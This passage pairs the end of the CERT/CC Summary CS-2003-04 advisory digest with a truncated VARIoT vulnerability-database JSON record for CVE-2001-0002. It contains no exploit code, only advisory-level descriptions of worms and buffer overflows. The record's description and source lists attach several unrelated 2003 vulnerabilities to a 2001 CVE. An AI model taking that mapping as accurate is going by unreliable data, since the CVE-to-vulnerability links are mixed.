Multiple Vulnerabilities in SSL/TLS Implementations
http://www.cert.org/advisories/CA-2003-26.html
Vulnerability Note VU#935264
OpenSSL ASN.1 parser insecure memory deallocation
http://www.kb.cert.org/vuls/id/935264
Vulnerability Note VU#255484
OpenSSL contains integer overflow handling ASN.1 tags (1)
http://www.kb.cert.org/vuls/id/255484
Vulnerability Note VU#380864
OpenSSL contains integer overflow handling ASN.1 tags (2)
http://www.kb.cert.org/vuls/id/380864
Vulnerability Note VU#686224
OpenSSL does not securely handle invalid public key when
configured to ignore errors
http://www.kb.cert.org/vuls/id/686224
Vulnerability Note VU#732952
OpenSSL accepts unsolicited client certificate messages
http://www.kb.cert.org/vuls/id/732952
Vulnerability Note VU#104280
Multiple vulnerabilities in SSL/TLS implementations
http://www.kb.cert.org/vuls/id/104280
Vulnerability Note VU#412478
OpenSSL 0.9.6k does not properly handle ASN.1 sequences
http://www.kb.cert.org/vuls/id/412478
5. Exploitation of Internet Explorer Vulnerability
The CERT/CC received a number of reports indicating that attackers
were actively exploiting the Microsoft Internet Explorer
vulnerability described in VU#865940. These attacks include the
installation of tools for launching distributed denial-of-service
(DDoS) attacks, providing generic proxy services, reading
sensitive information from the Windows registry, and using a
victim system's modem to dial pay-per-minute services. The
vulnerability described in VU#865940 exists due to an interaction
between IE's MIME type processing and the way it handles HTML
application (HTA) files embedded in OBJECT tags.
6. W32/Swen.A Worm
On September 19, the CERT/CC began receiving a large volume of
reports of a mass mailing worm, referred to as W32/Swen.A,
spreading on the Internet. Similar to W32/Gibe.B in function, this
worm arrives as an attachment claiming to be a Microsoft Internet
Explorer Update or a delivery failure notice from qmail. The
W32/Swen.A worm requires a user to execute the attachment either
manually or by using an email client that will open the attachment
automatically. Upon opening the attachment, the worm attempts to
mail itself to all email addresses it finds on the system. The
CERT/CC updated the current activity page to contain further
information on this worm.
Current Activity - September 19, 2003
http://www.cert.org/current/archive/2003/09/19/archive.html#swena
7. Buffer Overflow in Sendmail
Sendmail, a widely deployed mail transfer agent (MTA), contains a
vulnerability that could allow an attacker to execute arbitrary
code with the privileges of the sendmail daemon, typically root.
CERT Advisory CA-2003-25
Buffer Overflow in Sendmail
http://www.cert.org/advisories/CA-2003-25.html
Vulnerability Note VU#784980
Sendmail prescan() buffer overflow vulnerability
http://www.kb.cert.org/vuls/id/784980
8.
CERT Advisory CA-2003-23
RPCSS Vulnerabilities in Microsoft Windows
http://www.cert.org/advisories/CA-2003-23.html
Vulnerability Note VU#483492
Microsoft Windows RPCSS Service contains heap overflow in
DCOM activation routines
http://www.kb.cert.org/vuls/id/483492
Vulnerability Note VU#254236
Microsoft Windows RPCSS Service contains heap overflow in
DCOM request filename handling
http://www.kb.cert.org/vuls/id/254236
Vulnerability Note VU#326746
Microsoft Windows RPC service vulnerable to
denial of service
http://www.kb.cert.org/vuls/id/326746
New CERT Coordination Center (CERT/CC) PGP Key
On October 15, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.
CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc
Sending Sensitive Information to the CERT/CC
https://www.cert.org/contact_cert/encryptmail.html
What's New and Updated
Since the last CERT Summary, we have published new and updated
* Advisories
http://www.cert.org/advisories/
* Vulnerability Notes
http://www.kb.cert.org/vuls
* CERT/CC Statistics
http://www.cert.org/stats/cert_stats.html
* Congressional Testimony
http://www.cert.org/congressional_testimony
* Training Schedule
http://www.cert.org/training/
* CSIRT Development
http://www.cert.org/csirts/
This document is available from: http://www.cert.org/summaries/CS-2003-04.html
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message
subscribe cert-advisory
- "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Conditions for use, disclaimers, and sponsorship information
Copyright ©2003 Carnegie Mellon University.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200107-0045",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 3.2,
"vendor": "microsoft",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.8,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandriva",
"version": null
},
{
"model": "windows script host",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "windows script host",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "internet explorer",
"scope": "lte",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "appgate network security ab",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cray",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cyclades",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "f secure",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "foundry",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "guardian digital",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm eserver",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ingrian",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "juniper",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mirapoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "network appliance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nokia",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openpkg",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openwall gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "riverstone",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "tfs",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustix secure linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.01"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:windows_script_host:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:windows_script_host:5.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "5.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovered by Georgi Guninski \u003cguninski@guninski.com\u003e on Nov 20, 2000 and posted in a Microsoft Security Bulletin (MS01-015).",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
}
],
"trust": 0.6
},
"cve": "CVE-2001-0002",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2001-0002",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2001-0002",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#333628",
"trust": 0.8,
"value": "28.98"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#483492",
"trust": 0.8,
"value": "94.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#326746",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#254236",
"trust": 0.8,
"value": "94.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#334928",
"trust": 0.8,
"value": "7.09"
},
{
"author": "CNNVD",
"id": "CNNVD-200107-151",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Internet Explorer 5.5 and earlier allows remote attackers to obtain the physical location of cached content and open the content in the Local Computer Zone, then use compiled HTML help (.chm) files to execute arbitrary programs. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft\u0027s Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. Certain versions of Microsoft Internet Explorer (IE) that support double-byte character sets (DBCS) contain a buffer overflow vulnerability in the Type attribute of the OBJECT element. A remote attacker could execute arbitrary code with the privileges of the user running IE. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ Internet Explorer Is XML There is a problem with the style sheet processing, and even if the script is disabled in the security zone, the script will be executed. Outlook Express Including many MUA Then XML Document IE Since it is displayed using the component of, the script may be executed just by displaying the mail.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. We are sending this message to help ensure that\nadministrators have not overlooked one or more of these vulnerabilities. \n\nThere have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues \n are exploitable, but they are resolved in version 3.7.1. These four additional \n flaws are believed to be relatively minor, and are scheduled to be\n included in the next version of OpenSSH. 
\n Exploitation of this vulnerability may lead to a remote attacker \n gaining privileged access to the server, in some cases root access. \n\nVU#209807 - Portable OpenSSH server PAM conversion stack corruption\nhttp://www.kb.cert.org/vuls/id/209807\n\n There is a vulnerability in portable versions of OpenSSH 3.7p1 and\n 3.7.1p1 that may permit an attacker to corrupt the PAM conversion\n stack. \n\nPlease check the vulnerability notes for resolutions and additional \ndetails. \n\nThank you. \n-----BEGIN PGP SIGNED MESSAGE-----\n\nCERT Summary CS-2003-04\n\n November 24, 2003\n\n Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT\n Summary to draw attention to the types of attacks reported to our\n incident response team, as well as other noteworthy incident and\n vulnerability information. \n\n Past CERT summaries are available from:\n\n CERT Summaries\n http://www.cert.org/summaries/\n ______________________________________________________________________\n\nRecent Activity\n\n Since the last regularly scheduled CERT summary, issued in September\n 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft\n Windows Workstation Service, RPCSS Service, and Exchange. \n We have received reports of W32/Swen.A, W32/Mimail variants, and\n exploitation of an Internet Explorer vulnerability reported in August\n of 2003. \n\n For more current information on activity being reported to the\n CERT/CC, please visit the CERT/CC Current Activity page. The Current\n Activity page is a regularly updated summary of the most frequent,\n high-impact types of security incidents and vulnerabilities being\n reported to the CERT/CC. The information on the Current Activity page\n is reviewed and updated as reporting trends change. \n\n CERT/CC Current Activity\n http://www.cert.org/current/current_activity.html\n\n\n 1. W32/Mimail Variants\n\n The CERT/CC has received reports of several new variants of the\n \u0027Mimail\u0027 worm. 
The most recent variant of the worm (W32/Mimail.J)\n arrives as an email message alleging to be from the Paypal\n financial service. The message requests that the recipient\n \u0027verify\u0027 their account information to prevent the suspension of\n their Paypal account. Attached to the email is an executable file\n which captures this information (if entered), and sends it to a\n number of email addresses. \n\n Current Activity - November 19, 2003\n http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili\n\n\n 2. \n\n CERT Advisory CA-2003-28\n\t\tBuffer Overflow in Windows Workstation Service\n http://www.cert.org/advisories/CA-2003-28.html\n\n Vulnerability Note VU#567620\n\t\tMicrosoft Windows Workstation service vulnerable to \n\t\tbuffer overflow when sent specially crafted network\n\t\tmessage\n http://www.kb.cert.org/vuls/id/567620\n\n\n 3. \n\n CERT Advisory CA-2003-27\n\t\tMultiple Vulnerabilities in Microsoft Windows and \n\t\tExchange\n http://www.cert.org/advisories/CA-2003-27.html\n\n Vulnerability Note VU#575892\n\t\tBuffer overflow in Microsoft Windows Messenger Service\n http://www.kb.cert.org/vuls/id/575892\n\n Vulnerability Note VU#422156\n\t\tMicrosoft Exchange Server fails to properly handle\n\t\tspecially crafted SMTP extended verb requests\n http://www.kb.cert.org/vuls/id/422156\n\n Vulnerability Note VU#467036\n\t\tMicrosoft Windows Help and support Center contains buffer\n\t\toverflow in code used to handle HCP protocol\n http://www.kb.cert.org/vuls/id/467036\n\n Vulnerability Note VU#989932\n\t\tMicrosoft Windows contains buffer overflow in Local \n\t\tTroubleshooter ActiveX control (Tshoot.ocx)\n http://www.kb.cert.org/vuls/id/989932\n\n Vulnerability Note VU#838572\n\t\tMicrosoft Windows Authenticode mechanism installs ActiveX\n\t\tcontrols without prompting user\n http://www.kb.cert.org/vuls/id/838572\n\n Vulnerability Note VU#435444\n\t\tMicrosoft Outlook Web Access (OWA) contains cross-site\n\t\tscripting vulnerability in 
the \"Compose New Message\" form\n http://www.kb.cert.org/vuls/id/435444\n\n Vulnerability Note VU#967668\n\t\tMicrosoft Windows ListBox and ComboBox controls vulnerable\n\t\tto buffer overflow when supplied crafted Windows message\n http://www.kb.cert.org/vuls/id/967668\n\n\n 4. Multiple Vulnerabilities in SSL/TLS Implementations\n\n Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)\n and Transport Layer Security (TLS) protocols allowing an attacker\n to execute arbitrary code or cause a denial-of-service condition. \n\n CERT Advisory CA-2003-26\n\t\tMultiple Vulnerabilities in SSL/TLS Implementations\n http://www.cert.org/advisories/CA-2003-26.html\n\n Vulnerability Note VU#935264\n\t\tOpenSSL ASN.1 parser insecure memory deallocation\n http://www.kb.cert.org/vuls/id/935264\n\n Vulnerability Note VU#255484\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (1)\n http://www.kb.cert.org/vuls/id/255484\n\n Vulnerability Note VU#380864\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (2)\n http://www.kb.cert.org/vuls/id/380864\n\n Vulnerability Note VU#686224\n\t\tOpenSSL does not securely handle invalid public key when\n\t\tconfigured to ignore errors\n http://www.kb.cert.org/vuls/id/686224\n\n Vulnerability Note VU#732952\n\t\tOpenSSL accepts unsolicited client certificate messages\n http://www.kb.cert.org/vuls/id/732952\n\n Vulnerability Note VU#104280\n\t\tMultiple vulnerabilities in SSL/TLS implementations\n http://www.kb.cert.org/vuls/id/104280\n\n Vulnerability Note VU#412478\n\t\tOpenSSL 0.9.6k does not properly handle ASN.1 sequences\n http://www.kb.cert.org/vuls/id/412478\n\n\n 5. Exploitation of Internet Explorer Vulnerability\n\n The CERT/CC received a number of reports indicating that attackers\n were actively exploiting the Microsoft Internet Explorer\n vulnerability described in VU#865940. 
These attacks include the\n installation of tools for launching distributed denial-of-service\n (DDoS) attacks, providing generic proxy services, reading\n sensitive information from the Windows registry, and using a\n victim system\u0027s modem to dial pay-per-minute services. The\n vulnerability described in VU#865940 exists due to an interaction\n between IE\u0027s MIME type processing and the way it handles HTML\n application (HTA) files embedded in OBJECT tags. W32/Swen.A Worm\n\n On September 19, the CERT/CC began receiving a large volume of\n reports of a mass mailing worm, referred to as W32/Swen.A,\n spreading on the Internet. Similar to W32/Gibe.B in function, this\n worm arrives as an attachment claiming to be a Microsoft Internet\n Explorer Update or a delivery failure notice from qmail. The\n W32/Swen.A worm requires a user to execute the attachment either\n manually or by using an email client that will open the attachment\n automatically. Upon opening the attachment, the worm attempts to\n mail itself to all email addresses it finds on the system. The\n CERT/CC updated the current activity page to contain further\n information on this worm. \n\n Current Activity - September 19, 2003\n http://www.cert.org/current/archive/2003/09/19/archive.html#swena\n\n\n 7. Buffer Overflow in Sendmail\n\n Sendmail, a widely deployed mail transfer agent (MTA), contains a\n vulnerability that could allow an attacker to execute arbitrary\n code with the privileges of the sendmail daemon, typically root. \n\n CERT Advisory CA-2003-25\n\t\tBuffer Overflow in Sendmail\n http://www.cert.org/advisories/CA-2003-25.html\n\n Vulnerability Note VU#784980\n\t\tSendmail prescan() buffer overflow vulnerability\n http://www.kb.cert.org/vuls/id/784980\n\n\n 8. 
\n\n CERT Advisory CA-2003-23\n\t\tRPCSS Vulnerabilities in Microsoft Windows\n http://www.cert.org/advisories/CA-2003-23.html\n\n Vulnerability Note VU#483492\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM activation routines\n http://www.kb.cert.org/vuls/id/483492\n\n Vulnerability Note VU#254236\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM request filename handling\n http://www.kb.cert.org/vuls/id/254236\n\n Vulnerability Note VU#326746\n\t\tMicrosoft Windows RPC service vulnerable to \n\t\tdenial of service\n http://www.kb.cert.org/vuls/id/326746\n ______________________________________________________________________\n\nNew CERT Coordination Center (CERT/CC) PGP Key\n\n On October 15, the CERT/CC issued a new PGP key, which should be used\n when sending sensitive information to the CERT/CC. \n\n CERT/CC PGP Public Key\n https://www.cert.org/pgp/cert_pgp_key.asc\n\n Sending Sensitive Information to the CERT/CC\n https://www.cert.org/contact_cert/encryptmail.html\n ______________________________________________________________________\n\nWhat\u0027s New and Updated\n\n Since the last CERT Summary, we have published new and updated\n * Advisories\n http://www.cert.org/advisories/\n * Vulnerability Notes\n http://www.kb.cert.org/vuls\n * CERT/CC Statistics\n http://www.cert.org/stats/cert_stats.html\n * Congressional Testimony\n http://www.cert.org/congressional_testimony\n * Training Schedule\n http://www.cert.org/training/\n * CSIRT Development\n http://www.cert.org/csirts/\n ______________________________________________________________________\n\n This document is available from:\n http://www.cert.org/summaries/CS-2003-04.html\n ______________________________________________________________________\n\nCERT/CC Contact Information\n\n Email: cert@cert.org\n Phone: +1 412-268-7090 (24-hour hotline)\n Fax: +1 412-268-6989\n Postal address:\n CERT Coordination Center\n Software Engineering Institute\n Carnegie 
Mellon University\n Pittsburgh PA 15213-3890\n U.S.A. \n\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\n during other hours, on U.S. holidays, and on weekends. \n\nUsing encryption\n\n We strongly urge you to encrypt sensitive information sent by email. \n Our public PGP key is available from\n http://www.cert.org/CERT_PGP.key\n\n If you prefer to use DES, please call the CERT hotline for more\n information. \n\nGetting security information\n\n CERT publications and other security information are available from\n our web site\n http://www.cert.org/\n\n To subscribe to the CERT mailing list for advisories and bulletins,\n send email to majordomo@cert.org. Please include in the body of your\n message\n\n subscribe cert-advisory\n\n * \"CERT\" and \"CERT Coordination Center\" are registered in the U.S. \n Patent and Trademark Office. \n ______________________________________________________________________\n\n NO WARRANTY\n Any material furnished by Carnegie Mellon University and the Software\n Engineering Institute is furnished on an \"as is\" basis. Carnegie\n Mellon University makes no warranties of any kind, either expressed or\n implied as to any matter including, but not limited to, warranty of\n fitness for a particular purpose or merchantability, exclusivity or\n results obtained from use of the material. Carnegie Mellon University\n does not make any warranty of any kind with respect to freedom from\n patent, trademark, or copyright infringement. \n ______________________________________________________________________\n\n Conditions for use, disclaimers, and sponsorship information\n\n Copyright \\xa92003 Carnegie Mellon University. 
\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0002"
},
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
}
],
"trust": 5.4
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#326746",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2001-0002",
"trust": 2.4
},
{
"db": "CERT/CC",
"id": "VU#254236",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#483492",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "7823",
"trust": 1.6
},
{
"db": "BID",
"id": "2456",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#333628",
"trust": 1.0
},
{
"db": "SECUNIA",
"id": "10156",
"trust": 0.8
},
{
"db": "XF",
"id": "12970",
"trust": 0.8
},
{
"db": "BID",
"id": "7806",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#334928",
"trust": 0.8
},
{
"db": "BID",
"id": "2633",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "VU#602204",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#209807",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "31735",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#784980",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#575892",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#255484",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#865940",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#467036",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#380864",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#838572",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#422156",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#412478",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#935264",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#686224",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#104280",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#567620",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#989932",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#967668",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#435444",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#732952",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32268",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
